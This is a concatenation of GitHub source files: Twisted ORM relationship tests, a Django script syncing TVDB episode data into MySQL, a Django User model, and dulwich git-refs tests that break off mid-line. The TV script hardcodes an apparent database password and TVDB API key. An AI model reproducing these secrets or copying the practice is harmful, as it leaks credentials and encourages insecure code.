nicknameone)\n if not nicknames[1] == nicknameone:\n self.assertEqual(nicknames[1], nicknametwo)\n\n boy = yield nicknameone.nicknameable.get()\n self.assertEqual(boy, self.boy)\n\n nickname = yield Nickname(value=\"Suzzy\").save()\n yield nickname.nicknameable.set(self.girl)\n nicknames = yield self.girl.nicknames.get()\n self.assertEqual(len(nicknames), 1)\n self.assertEqual(nicknames[0], nickname)\n self.assertEqual(nicknames[0].value, nickname.value)\n\n\n @inlineCallbacks\n def test_belongs_to(self):\n user = yield self.picture.user.get()\n self.assertEqual(user, self.user)\n\n\n @inlineCallbacks\n def test_set_belongs_to(self):\n user = yield User(first_name=\"new one\").save()\n yield self.picture.user.set(user)\n self.assertEqual(user.id, self.picture.user_id)\n\n\n @inlineCallbacks\n def test_set_on_unsaved(self):\n yield User(first_name=\"new one\").save()\n picture = Picture(name=\"a pic\")\n self.assertRaises(ReferenceNotSavedError, getattr, picture, 'user')\n\n\n @inlineCallbacks\n def test_clear_belongs_to(self):\n picture = yield Picture(name=\"a pic\", size=10, user_id=self.user.id).save()\n yield picture.user.clear()\n user = yield picture.user.get()\n self.assertEqual(user, None)\n yield picture.refresh()\n user = yield picture.user.get()\n self.assertEqual(user, None)\n\n\n @inlineCallbacks\n def test_has_many(self):\n # First, make a few pics\n ids = [self.picture.id]\n for _ in range(3):\n pic = yield Picture(user_id=self.user.id).save()\n ids.append(pic.id)\n\n pics = yield self.user.pictures.get()\n picids = [p.id for p in pics]\n self.assertEqual(ids, picids)\n\n\n @inlineCallbacks\n def test_has_many_count(self):\n # First, make a few pics\n ids = [self.picture.id]\n for _ in range(3):\n pic = yield Picture(user_id=self.user.id).save()\n ids.append(pic.id)\n\n totalnum = yield self.user.pictures.count()\n self.assertEqual(totalnum, 4)\n\n\n @inlineCallbacks\n def test_has_many_count_nocache(self):\n # First, count comments\n totalnum = yield self.user.comments.count()\n self.assertEqual(totalnum, 0)\n\n for _ in range(3):\n yield Comment(user_id=self.user.id).save()\n\n totalnum = yield self.user.comments.count()\n self.assertEqual(totalnum, 3)\n\n\n @inlineCallbacks\n def test_has_many_get_with_args(self):\n # First, make a few pics\n ids = [self.picture.id]\n for _ in range(3):\n pic = yield Picture(user_id=self.user.id).save()\n ids.append(pic.id)\n\n pics = yield self.user.pictures.get(where=['name = ?', 'a pic'])\n self.assertEqual(len(pics), 1)\n self.assertEqual(pics[0].name, 'a pic')\n\n\n @inlineCallbacks\n def test_has_many_count_with_args(self):\n # First, make a few pics\n ids = [self.picture.id]\n for _ in range(3):\n pic = yield Picture(user_id=self.user.id).save()\n ids.append(pic.id)\n\n picsnum = yield self.user.pictures.count(where=['name = ?', 'a pic'])\n self.assertEqual(picsnum, 1)\n\n\n @inlineCallbacks\n def test_set_has_many(self):\n # First, make a few pics\n pics = [self.picture]\n for _ in range(3):\n pic = yield Picture(name=\"a pic\").save()\n pics.append(pic)\n picids = [int(p.id) for p in pics]\n\n yield self.user.pictures.set(pics)\n results = yield self.user.pictures.get()\n resultids = [int(p.id) for p in results]\n picids.sort()\n resultids.sort()\n self.assertEqual(picids, resultids)\n\n # now try resetting\n pics = []\n for _ in range(3):\n pic = yield Picture(name=\"a pic\").save()\n pics.append(pic)\n picids = [p.id for p in pics]\n\n yield self.user.pictures.set(pics)\n results = yield self.user.pictures.get()\n resultids = 
[p.id for p in results]\n self.assertEqual(picids, resultids)\n\n\n @inlineCallbacks\n def test_clear_has_many(self):\n pics = [self.picture]\n for _ in range(3):\n pic = yield Picture(name=\"a pic\").save()\n pics.append(pic)\n\n yield self.user.pictures.set(pics)\n yield self.user.pictures.clear()\n\n userpics = yield self.user.pictures.get()\n self.assertEqual(userpics, [])\n\n # even go so far as to refetch user\n yield User.find(self.user.id)\n userpics = yield self.user.pictures.get()\n self.assertEqual(userpics, [])\n\n # picture records should be updated\n pics = yield Picture.find(where=[\"user_id=?\", self.user.id])\n self.assertEqual(pics, [])\n\n # but still exist\n pics = yield Picture.all()\n self.assertEqual(len(pics), 4)\n\n\n @inlineCallbacks\n def test_has_one(self):\n avatar = yield self.user.avatar.get()\n self.assertEqual(avatar, self.avatar)\n\n\n @inlineCallbacks\n def test_set_has_one(self):\n avatar = yield Avatar(name=\"another\").save()\n yield self.user.avatar.set(avatar)\n yield avatar.refresh()\n self.assertEqual(avatar.user_id, self.user.id)\n\n\n @inlineCallbacks\n def test_habtm(self):\n color = yield FavoriteColor(name=\"red\").save()\n colors = [self.favcolor, color]\n colorids = [c.id for c in colors]\n yield FavoriteColor(name=\"green\").save()\n\n args = {'user_id': self.user.id, 'favorite_color_id': colors[0].id}\n yield self.config.insert('favorite_colors_users', args)\n args = {'user_id': self.user.id, 'favorite_color_id': colors[1].id}\n yield self.config.insert('favorite_colors_users', args)\n\n newcolors = yield self.user.favorite_colors.get()\n newcolorids = [c.id for c in newcolors]\n self.assertEqual(newcolorids, colorids)\n\n\n @inlineCallbacks\n def test_habtm_with_joinwhere(self):\n color = yield FavoriteColor(name=\"red\").save()\n colors = [self.favcolor, color]\n yield FavoriteColor(name=\"green\").save()\n\n args = {'user_id': self.user.id, 'favorite_color_id': colors[0].id, 'palette_id': 1}\n yield self.config.insert('favorite_colors_users', args)\n args = {'user_id': self.user.id, 'favorite_color_id': colors[1].id, 'palette_id': 2}\n yield self.config.insert('favorite_colors_users', args)\n\n newcolors = yield self.user.favorite_colors.get(join_where=['palette_id = ?', 2])\n newcolorids = [c.id for c in newcolors]\n self.assertEqual(newcolorids, [colors[1].id])\n\n\n @inlineCallbacks\n def test_habtm_count(self):\n color = yield FavoriteColor(name=\"red\").save()\n colors = [self.favcolor, color]\n yield FavoriteColor(name=\"green\").save()\n\n args = {'user_id': self.user.id, 'favorite_color_id': colors[0].id}\n yield self.config.insert('favorite_colors_users', args)\n args = {'user_id': self.user.id, 'favorite_color_id': colors[1].id}\n yield self.config.insert('favorite_colors_users', args)\n\n newcolorsnum = yield self.user.favorite_colors.count()\n self.assertEqual(newcolorsnum, 2)\n\n\n @inlineCallbacks\n def test_habtm_get_with_args(self):\n color = yield FavoriteColor(name=\"red\").save()\n colors = [self.favcolor, color]\n\n args = {'user_id': self.user.id, 'favorite_color_id': colors[0].id}\n yield self.config.insert('favorite_colors_users', args)\n args = {'user_id': self.user.id, 'favorite_color_id': colors[1].id}\n yield self.config.insert('favorite_colors_users', args)\n\n newcolor = yield self.user.favorite_colors.get(where=['name = ?', 'red'], limit=1)\n self.assertEqual(newcolor.id, color.id)\n\n\n @inlineCallbacks\n def test_habtm_count_with_args(self):\n color = yield FavoriteColor(name=\"red\").save()\n colors = 
[self.favcolor, color]\n\n args = {'user_id': self.user.id, 'favorite_color_id': colors[0].id}\n yield self.config.insert('favorite_colors_users', args)\n args = {'user_id': self.user.id, 'favorite_color_id': colors[1].id}\n yield self.config.insert('favorite_colors_users', args)\n\n newcolorsnum = yield self.user.favorite_colors.count(where=['name = ?', 'red'])\n self.assertEqual(newcolorsnum, 1)\n\n\n @inlineCallbacks\n def test_set_habtm(self):\n user = yield User().save()\n color = yield FavoriteColor(name=\"red\").save()\n colors = [self.favcolor, color]\n colorids = [c.id for c in colors]\n\n yield user.favorite_colors.set(colors)\n newcolors = yield user.favorite_colors.get()\n newcolorids = [c.id for c in newcolors]\n self.assertEqual(newcolorids, colorids)\n\n\n @inlineCallbacks\n def test_clear_habtm(self):\n user = yield User().save()\n color = yield FavoriteColor(name=\"red\").save()\n colors = [self.favcolor, color]\n\n yield user.favorite_colors.set(colors)\n yield user.favorite_colors.clear()\n colors = yield user.favorite_colors.get()\n self.assertEqual(colors, [])\n\n\n @inlineCallbacks\n def test_clear_jointable_on_delete_habtm(self):\n user = yield User().save()\n color = yield FavoriteColor(name=\"red\").save()\n colors = [self.favcolor, color]\n\n yield user.favorite_colors.set(colors)\n old_id = color.id\n yield color.delete()\n result = yield self.config.select('favorite_colors_users', where=['favorite_color_id = ?', old_id], limit=1)\n self.assertTrue(result is None)\n\n\n @inlineCallbacks\n def test_clear_jointable_on_delete_habtm_with_custom_args(self):\n join_tablename = 'posts_categories'\n post = yield Blogpost(title='headline').save()\n category = yield Category(name=\"personal\").save()\n\n yield post.categories.set([category])\n cat_id = category.id\n yield category.delete()\n res = yield self.config.select(join_tablename, where=['category_id = ?', cat_id], limit=1)\n self.assertIsNone(res)\n\n\n @inlineCallbacks\n def test_set_habtm_blank(self):\n user = yield User().save()\n color = yield FavoriteColor(name=\"red\").save()\n colors = [self.favcolor, color]\n\n yield user.favorite_colors.set(colors)\n # now blank out\n yield user.favorite_colors.set([])\n newcolors = yield user.favorite_colors.get()\n self.assertEqual(len(newcolors), 0)\n","repo_name":"bmuller/twistar","sub_path":"twistar/tests/test_relationships.py","file_name":"test_relationships.py","file_ext":"py","file_size_in_byte":12978,"program_lang":"python","lang":"en","doc_type":"code","stars":133,"dataset":"github-code","pt":"68"} +{"seq_id":"24797148074","text":"from django.utils import timezone\nfrom datetime import date, datetime, time, timedelta\nfrom time import mktime\nfrom pytvdbapi import api\nimport feedparser\nimport os\nimport MySQLdb\nconnection=MySQLdb.connect(\n host='localhost',user='aristia',passwd='Petransikey18',db='aristia')\ncursor=connection.cursor()\n\ntoday = date.today()\ndt0 = timezone.make_aware(datetime.combine(today - timedelta(days=2), time.min))\ndt1 = timezone.make_aware(datetime.combine(today - timedelta(days=30), time.min))\ndt3 = timezone.make_aware(datetime.combine(today - timedelta(days=500), time.min))\ndt_today = timezone.make_aware(datetime.combine(today, time.min))\ndt_1000 = timezone.make_aware(datetime.combine(today + timedelta(days=1000), time.min)) # assumed placeholder for 'not downloaded yet'\n\nmodule_dir = os.path.dirname(__file__) # get current directory\n\ndb = api.TVDB(\"D620620B2C727377\", banners=True)\n\n#series = Series.objects.filter(lastlookup__lt=dt0)\nsql=\"SELECT id,title FROM shows_series WHERE lastlookup < %s\"\ncursor.execute(sql, (dt0,))\nseries=cursor.fetchall()\n\n\nfor show in series:\n result = db.search(show[1],\"en\")\n tvdbshow = result[0]\n for 
tvdbseason in tvdbshow:\n for tvdbepi in tvdbseason:\n\n #Episode.objects.filter(due__lte=dt3).delete()# delete old episodes\n try:\n AiredDT = timezone.make_aware(datetime.combine(tvdbepi.FirstAired, time.min))\n except Exception:\n AiredDT = None\n if AiredDT is not None and AiredDT > dt1:\n try:\n sql=\"SELECT `id`, `due` FROM shows_episodes WHERE `season`=%s AND `episode`=%s AND serid=%s\"\n cursor.execute(sql, (tvdbepi.SeasonNumber,tvdbepi.EpisodeNumber,tvdbshow.id))\n dupe = cursor.fetchone()\n except Exception:\n dupe = None\n if dupe is None: \n sql=\"INSERT INTO shows_episodes (`title`,`season`,`episode`,`date_added`,`due`,`desc`,`serid`,`epiid`,`seaid`,`downloaded`,`series_id`) VALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\n cursor.execute(sql, (tvdbshow.SeriesName, tvdbepi.SeasonNumber, tvdbepi.EpisodeNumber, dt_today, AiredDT, tvdbepi.Overview, tvdbshow.id, tvdbepi.id, tvdbepi.seasonid, dt_1000, show[0]))\n\n elif dupe[1] != AiredDT: \n sql=\"UPDATE shows_episodes SET `date_added`=%s, `due`=%s, `desc`=%s,`serid`=%s,`epiid`=%s, `seaid`=%s WHERE `id` = %s\"\n cursor.execute(sql, (dt_today, AiredDT, tvdbepi.Overview, tvdbshow.id, tvdbepi.id, tvdbepi.seasonid, dupe[0]))\n\n \n sql=\"UPDATE shows_series SET `lastlookup`=%s,`tvdbid`=%s,`overview`=%s,`firstaired`=%s,`imdb`=%s WHERE `id` = %s\"\n cursor.execute(sql, (dt_today,tvdbshow.id,tvdbshow.Overview,timezone.make_aware(datetime.combine(tvdbshow.FirstAired, time.min)),tvdbshow.IMDB_ID,show[0]))\n connection.close()","repo_name":"enfie01s/DjangoBasedWebsite","sub_path":"shows/tvupdate.py","file_name":"tvupdate.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"35399823430","text":"from django.contrib.auth.base_user import AbstractBaseUser\nfrom django.contrib.auth.models import PermissionsMixin\nfrom django.db import models\n# library for translating from English to the language set in settings\nfrom django.utils.translation import gettext_lazy as _\nfrom django.utils import timezone\nfrom django.core.mail import send_mail\n\n\nclass User(AbstractBaseUser, PermissionsMixin):\n \"\"\"\n App base User class\n\n Email and password are required. Other fields are optional\n \"\"\"\n\n first_name = models.CharField(_('first name'), max_length=30, blank=True)\n email = models.EmailField(_('email address'), unique=True) # unique ensures only one user per email\n is_staff = models.BooleanField( # is_staff defines which users can access\n _('staff status'), # the django admin\n default=False,\n help_text=_('Designates whether the user can log into this admin site.'),\n )\n is_active = models.BooleanField( # is_active defines whether the user can log in\n _('active'), # to the system\n default=True,\n help_text=_(\n 'Designates whether this user should be treated as active. 
'\n 'Unselect this instead of deleting accounts.'\n ),\n )\n date_joined = models.DateTimeField(_('date joined'), default=timezone.now)\n # date_joined records when the user joined the system\n\n #objects = UserManager()\n\n EMAIL_FIELD = 'email' # name of the field holding the email\n USERNAME_FIELD = 'email' # name of the field used as the username\n REQUIRED_FIELDS = []\n\n class Meta:\n verbose_name = _('user')\n verbose_name_plural = _('users')\n\n def clean(self):\n super().clean()\n self.email = self.__class__.objects.normalize_email(self.email)\n\n def get_full_name(self):\n \"\"\"\n Return the first_name.\n \"\"\"\n full_name = '%s' % (self.first_name)\n return full_name.strip()\n\n def get_short_name(self):\n \"\"\"Return the user's short name.\"\"\"\n return self.first_name\n\n def email_user(self, subject, message, from_email=None, **kwargs):\n \"\"\"Send an email to the user.\"\"\"\n send_mail(subject, message, from_email, [self.email], **kwargs)\n","repo_name":"fhfraga/curso-django","sub_path":"base/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"19228533351","text":"import os\nimport sys\nimport tempfile\nfrom io import BytesIO\n\nfrom dulwich import errors\nfrom dulwich.tests import SkipTest, TestCase\n\nfrom ..file import GitFile\nfrom ..objects import ZERO_SHA\nfrom ..refs import (\n DictRefsContainer,\n InfoRefsContainer,\n SymrefLoop,\n _split_ref_line,\n check_ref_format,\n parse_symref_value,\n read_packed_refs,\n read_packed_refs_with_peeled,\n strip_peeled_refs,\n write_packed_refs,\n)\nfrom ..repo import Repo\nfrom .utils import open_repo, tear_down_repo\n\n\nclass CheckRefFormatTests(TestCase):\n \"\"\"Tests for the check_ref_format function.\n\n These are the same tests as in the git test suite.\n \"\"\"\n\n def test_valid(self):\n self.assertTrue(check_ref_format(b\"heads/foo\"))\n self.assertTrue(check_ref_format(b\"foo/bar/baz\"))\n self.assertTrue(check_ref_format(b\"refs///heads/foo\"))\n self.assertTrue(check_ref_format(b\"foo./bar\"))\n self.assertTrue(check_ref_format(b\"heads/foo@bar\"))\n self.assertTrue(check_ref_format(b\"heads/fix.lock.error\"))\n\n def test_invalid(self):\n self.assertFalse(check_ref_format(b\"foo\"))\n self.assertFalse(check_ref_format(b\"heads/foo/\"))\n self.assertFalse(check_ref_format(b\"./foo\"))\n self.assertFalse(check_ref_format(b\".refs/foo\"))\n self.assertFalse(check_ref_format(b\"heads/foo..bar\"))\n self.assertFalse(check_ref_format(b\"heads/foo?bar\"))\n self.assertFalse(check_ref_format(b\"heads/foo.lock\"))\n self.assertFalse(check_ref_format(b\"heads/v@{ation\"))\n self.assertFalse(check_ref_format(b\"heads/foo\\bar\"))\n\n\nONES = b\"1\" * 40\nTWOS = b\"2\" * 40\nTHREES = b\"3\" * 40\nFOURS = b\"4\" * 40\n\n\nclass PackedRefsFileTests(TestCase):\n def test_split_ref_line_errors(self):\n self.assertRaises(errors.PackedRefsException, _split_ref_line, b\"singlefield\")\n self.assertRaises(errors.PackedRefsException, _split_ref_line, b\"badsha name\")\n self.assertRaises(\n errors.PackedRefsException,\n _split_ref_line,\n ONES + b\" bad/../refname\",\n )\n\n def test_read_without_peeled(self):\n f = BytesIO(b\"\\n\".join([b\"# comment\", ONES + b\" ref/1\", TWOS + b\" ref/2\"]))\n self.assertEqual(\n [(ONES, b\"ref/1\"), (TWOS, b\"ref/2\")], list(read_packed_refs(f))\n )\n\n def test_read_without_peeled_errors(self):\n f = BytesIO(b\"\\n\".join([ONES + b\" ref/1\", 
b\"^\" + TWOS]))\n self.assertRaises(errors.PackedRefsException, list, read_packed_refs(f))\n\n def test_read_with_peeled(self):\n f = BytesIO(\n b\"\\n\".join(\n [\n ONES + b\" ref/1\",\n TWOS + b\" ref/2\",\n b\"^\" + THREES,\n FOURS + b\" ref/4\",\n ]\n )\n )\n self.assertEqual(\n [\n (ONES, b\"ref/1\", None),\n (TWOS, b\"ref/2\", THREES),\n (FOURS, b\"ref/4\", None),\n ],\n list(read_packed_refs_with_peeled(f)),\n )\n\n def test_read_with_peeled_errors(self):\n f = BytesIO(b\"\\n\".join([b\"^\" + TWOS, ONES + b\" ref/1\"]))\n self.assertRaises(errors.PackedRefsException, list, read_packed_refs(f))\n\n f = BytesIO(b\"\\n\".join([ONES + b\" ref/1\", b\"^\" + TWOS, b\"^\" + THREES]))\n self.assertRaises(errors.PackedRefsException, list, read_packed_refs(f))\n\n def test_write_with_peeled(self):\n f = BytesIO()\n write_packed_refs(f, {b\"ref/1\": ONES, b\"ref/2\": TWOS}, {b\"ref/1\": THREES})\n self.assertEqual(\n b\"\\n\".join(\n [\n b\"# pack-refs with: peeled\",\n ONES + b\" ref/1\",\n b\"^\" + THREES,\n TWOS + b\" ref/2\",\n ]\n )\n + b\"\\n\",\n f.getvalue(),\n )\n\n def test_write_without_peeled(self):\n f = BytesIO()\n write_packed_refs(f, {b\"ref/1\": ONES, b\"ref/2\": TWOS})\n self.assertEqual(\n b\"\\n\".join([ONES + b\" ref/1\", TWOS + b\" ref/2\"]) + b\"\\n\",\n f.getvalue(),\n )\n\n\n# Dict of refs that we expect all RefsContainerTests subclasses to define.\n_TEST_REFS = {\n b\"HEAD\": b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n b\"refs/heads/40-char-ref-aaaaaaaaaaaaaaaaaa\": b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n b\"refs/heads/master\": b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n b\"refs/heads/packed\": b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n b\"refs/tags/refs-0.1\": b\"df6800012397fb85c56e7418dd4eb9405dee075c\",\n b\"refs/tags/refs-0.2\": b\"3ec9c43c84ff242e3ef4a9fc5bc111fd780a76a8\",\n b\"refs/heads/loop\": b\"ref: refs/heads/loop\",\n}\n\n\nclass RefsContainerTests:\n def test_keys(self):\n actual_keys = set(self._refs.keys())\n self.assertEqual(set(self._refs.allkeys()), actual_keys)\n self.assertEqual(set(_TEST_REFS.keys()), actual_keys)\n\n actual_keys = self._refs.keys(b\"refs/heads\")\n actual_keys.discard(b\"loop\")\n self.assertEqual(\n [b\"40-char-ref-aaaaaaaaaaaaaaaaaa\", b\"master\", b\"packed\"],\n sorted(actual_keys),\n )\n self.assertEqual(\n [b\"refs-0.1\", b\"refs-0.2\"], sorted(self._refs.keys(b\"refs/tags\"))\n )\n\n def test_iter(self):\n actual_keys = set(self._refs.keys())\n self.assertEqual(set(self._refs), actual_keys)\n self.assertEqual(set(_TEST_REFS.keys()), actual_keys)\n\n def test_as_dict(self):\n # refs/heads/loop does not show up even if it exists\n expected_refs = dict(_TEST_REFS)\n del expected_refs[b\"refs/heads/loop\"]\n self.assertEqual(expected_refs, self._refs.as_dict())\n\n def test_get_symrefs(self):\n self._refs.set_symbolic_ref(b\"refs/heads/src\", b\"refs/heads/dst\")\n symrefs = self._refs.get_symrefs()\n if b\"HEAD\" in symrefs:\n symrefs.pop(b\"HEAD\")\n self.assertEqual(\n {\n b\"refs/heads/src\": b\"refs/heads/dst\",\n b\"refs/heads/loop\": b\"refs/heads/loop\",\n },\n symrefs,\n )\n\n def test_setitem(self):\n self._refs[b\"refs/some/ref\"] = b\"42d06bd4b77fed026b154d16493e5deab78f02ec\"\n self.assertEqual(\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n self._refs[b\"refs/some/ref\"],\n )\n self.assertRaises(\n errors.RefFormatError,\n self._refs.__setitem__,\n b\"notrefs/foo\",\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n )\n\n def test_set_if_equals(self):\n nines = b\"9\" * 40\n 
self.assertFalse(self._refs.set_if_equals(b\"HEAD\", b\"c0ffee\", nines))\n self.assertEqual(\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\", self._refs[b\"HEAD\"]\n )\n\n self.assertTrue(\n self._refs.set_if_equals(\n b\"HEAD\", b\"42d06bd4b77fed026b154d16493e5deab78f02ec\", nines\n )\n )\n self.assertEqual(nines, self._refs[b\"HEAD\"])\n\n # Setting the ref again is a no-op, but will return True.\n self.assertTrue(self._refs.set_if_equals(b\"HEAD\", nines, nines))\n self.assertEqual(nines, self._refs[b\"HEAD\"])\n\n self.assertTrue(self._refs.set_if_equals(b\"refs/heads/master\", None, nines))\n self.assertEqual(nines, self._refs[b\"refs/heads/master\"])\n\n self.assertTrue(\n self._refs.set_if_equals(b\"refs/heads/nonexistent\", ZERO_SHA, nines)\n )\n self.assertEqual(nines, self._refs[b\"refs/heads/nonexistent\"])\n\n def test_add_if_new(self):\n nines = b\"9\" * 40\n self.assertFalse(self._refs.add_if_new(b\"refs/heads/master\", nines))\n self.assertEqual(\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n self._refs[b\"refs/heads/master\"],\n )\n\n self.assertTrue(self._refs.add_if_new(b\"refs/some/ref\", nines))\n self.assertEqual(nines, self._refs[b\"refs/some/ref\"])\n\n def test_set_symbolic_ref(self):\n self._refs.set_symbolic_ref(b\"refs/heads/symbolic\", b\"refs/heads/master\")\n self.assertEqual(\n b\"ref: refs/heads/master\",\n self._refs.read_loose_ref(b\"refs/heads/symbolic\"),\n )\n self.assertEqual(\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n self._refs[b\"refs/heads/symbolic\"],\n )\n\n def test_set_symbolic_ref_overwrite(self):\n nines = b\"9\" * 40\n self.assertNotIn(b\"refs/heads/symbolic\", self._refs)\n self._refs[b\"refs/heads/symbolic\"] = nines\n self.assertEqual(nines, self._refs.read_loose_ref(b\"refs/heads/symbolic\"))\n self._refs.set_symbolic_ref(b\"refs/heads/symbolic\", b\"refs/heads/master\")\n self.assertEqual(\n b\"ref: refs/heads/master\",\n self._refs.read_loose_ref(b\"refs/heads/symbolic\"),\n )\n self.assertEqual(\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n self._refs[b\"refs/heads/symbolic\"],\n )\n\n def test_check_refname(self):\n self._refs._check_refname(b\"HEAD\")\n self._refs._check_refname(b\"refs/stash\")\n self._refs._check_refname(b\"refs/heads/foo\")\n\n self.assertRaises(errors.RefFormatError, self._refs._check_refname, b\"refs\")\n self.assertRaises(\n errors.RefFormatError, self._refs._check_refname, b\"notrefs/foo\"\n )\n\n def test_contains(self):\n self.assertIn(b\"refs/heads/master\", self._refs)\n self.assertNotIn(b\"refs/heads/bar\", self._refs)\n\n def test_delitem(self):\n self.assertEqual(\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n self._refs[b\"refs/heads/master\"],\n )\n del self._refs[b\"refs/heads/master\"]\n self.assertRaises(KeyError, lambda: self._refs[b\"refs/heads/master\"])\n\n def test_remove_if_equals(self):\n self.assertFalse(self._refs.remove_if_equals(b\"HEAD\", b\"c0ffee\"))\n self.assertEqual(\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\", self._refs[b\"HEAD\"]\n )\n self.assertTrue(\n self._refs.remove_if_equals(\n b\"refs/tags/refs-0.2\",\n b\"3ec9c43c84ff242e3ef4a9fc5bc111fd780a76a8\",\n )\n )\n self.assertTrue(self._refs.remove_if_equals(b\"refs/tags/refs-0.2\", ZERO_SHA))\n self.assertNotIn(b\"refs/tags/refs-0.2\", self._refs)\n\n def test_import_refs_name(self):\n self._refs[\n b\"refs/remotes/origin/other\"\n ] = b\"48d01bd4b77fed026b154d16493e5deab78f02ec\"\n self._refs.import_refs(\n b\"refs/remotes/origin\",\n {b\"master\": b\"42d06bd4b77fed026b154d16493e5deab78f02ec\"},\n 
)\n self.assertEqual(\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n self._refs[b\"refs/remotes/origin/master\"],\n )\n self.assertEqual(\n b\"48d01bd4b77fed026b154d16493e5deab78f02ec\",\n self._refs[b\"refs/remotes/origin/other\"],\n )\n\n def test_import_refs_name_prune(self):\n self._refs[\n b\"refs/remotes/origin/other\"\n ] = b\"48d01bd4b77fed026b154d16493e5deab78f02ec\"\n self._refs.import_refs(\n b\"refs/remotes/origin\",\n {b\"master\": b\"42d06bd4b77fed026b154d16493e5deab78f02ec\"},\n prune=True,\n )\n self.assertEqual(\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n self._refs[b\"refs/remotes/origin/master\"],\n )\n self.assertNotIn(b\"refs/remotes/origin/other\", self._refs)\n\n\nclass DictRefsContainerTests(RefsContainerTests, TestCase):\n def setUp(self):\n TestCase.setUp(self)\n self._refs = DictRefsContainer(dict(_TEST_REFS))\n\n def test_invalid_refname(self):\n # FIXME: Move this test into RefsContainerTests, but requires\n # some way of injecting invalid refs.\n self._refs._refs[b\"refs/stash\"] = b\"00\" * 20\n expected_refs = dict(_TEST_REFS)\n del expected_refs[b\"refs/heads/loop\"]\n expected_refs[b\"refs/stash\"] = b\"00\" * 20\n self.assertEqual(expected_refs, self._refs.as_dict())\n\n\nclass DiskRefsContainerTests(RefsContainerTests, TestCase):\n def setUp(self):\n TestCase.setUp(self)\n self._repo = open_repo(\"refs.git\")\n self.addCleanup(tear_down_repo, self._repo)\n self._refs = self._repo.refs\n\n def test_get_packed_refs(self):\n self.assertEqual(\n {\n b\"refs/heads/packed\": b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n b\"refs/tags/refs-0.1\": b\"df6800012397fb85c56e7418dd4eb9405dee075c\",\n },\n self._refs.get_packed_refs(),\n )\n\n def test_get_peeled_not_packed(self):\n # not packed\n self.assertEqual(None, self._refs.get_peeled(b\"refs/tags/refs-0.2\"))\n self.assertEqual(\n b\"3ec9c43c84ff242e3ef4a9fc5bc111fd780a76a8\",\n self._refs[b\"refs/tags/refs-0.2\"],\n )\n\n # packed, known not peelable\n self.assertEqual(\n self._refs[b\"refs/heads/packed\"],\n self._refs.get_peeled(b\"refs/heads/packed\"),\n )\n\n # packed, peeled\n self.assertEqual(\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n self._refs.get_peeled(b\"refs/tags/refs-0.1\"),\n )\n\n def test_setitem(self):\n RefsContainerTests.test_setitem(self)\n path = os.path.join(self._refs.path, b\"refs\", b\"some\", b\"ref\")\n with open(path, \"rb\") as f:\n self.assertEqual(b\"42d06bd4b77fed026b154d16493e5deab78f02ec\", f.read()[:40])\n\n self.assertRaises(\n OSError,\n self._refs.__setitem__,\n b\"refs/some/ref/sub\",\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n )\n\n def test_delete_refs_container(self):\n # We shouldn't delete the refs directory\n self._refs[b'refs/heads/blah'] = b\"42d06bd4b77fed026b154d16493e5deab78f02ec\"\n for ref in self._refs.allkeys():\n del self._refs[ref]\n self.assertTrue(os.path.exists(os.path.join(self._refs.path, b'refs')))\n\n def test_setitem_packed(self):\n with open(os.path.join(self._refs.path, b\"packed-refs\"), \"w\") as f:\n f.write(\"# pack-refs with: peeled fully-peeled sorted \\n\")\n f.write(\"42d06bd4b77fed026b154d16493e5deab78f02ec refs/heads/packed\\n\")\n\n # It's allowed to set a new ref on a packed ref, the new ref will be\n # placed outside on refs/\n self._refs[b\"refs/heads/packed\"] = b\"3ec9c43c84ff242e3ef4a9fc5bc111fd780a76a8\"\n packed_ref_path = os.path.join(self._refs.path, b\"refs\", b\"heads\", b\"packed\")\n with open(packed_ref_path, \"rb\") as f:\n self.assertEqual(b\"3ec9c43c84ff242e3ef4a9fc5bc111fd780a76a8\", 
f.read()[:40])\n\n self.assertRaises(\n OSError,\n self._refs.__setitem__,\n b\"refs/heads/packed/sub\",\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n )\n\n # this shouldn't overwrite the packed refs\n self.assertEqual(\n {b\"refs/heads/packed\": b\"42d06bd4b77fed026b154d16493e5deab78f02ec\"},\n self._refs.get_packed_refs(),\n )\n\n def test_add_packed_refs(self):\n # first, create a non-packed ref\n self._refs[b\"refs/heads/packed\"] = b\"3ec9c43c84ff242e3ef4a9fc5bc111fd780a76a8\"\n\n packed_ref_path = os.path.join(self._refs.path, b\"refs\", b\"heads\", b\"packed\")\n self.assertTrue(os.path.exists(packed_ref_path))\n\n # now overwrite that with a packed ref\n packed_refs_file_path = os.path.join(self._refs.path, b\"packed-refs\")\n self._refs.add_packed_refs(\n {\n b\"refs/heads/packed\": b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n }\n )\n\n # that should kill the file\n self.assertFalse(os.path.exists(packed_ref_path))\n\n # now delete the packed ref\n self._refs.add_packed_refs(\n {\n b\"refs/heads/packed\": None,\n }\n )\n\n # and it's gone!\n self.assertFalse(os.path.exists(packed_ref_path))\n\n self.assertRaises(\n KeyError,\n self._refs.__getitem__,\n b\"refs/heads/packed\",\n )\n\n # just in case, make sure we can't pack HEAD\n self.assertRaises(\n ValueError,\n self._refs.add_packed_refs,\n {b\"HEAD\": \"02ac81614bcdbd585a37b4b0edf8cb8a\"},\n )\n\n # delete all packed refs\n self._refs.add_packed_refs({ref: None 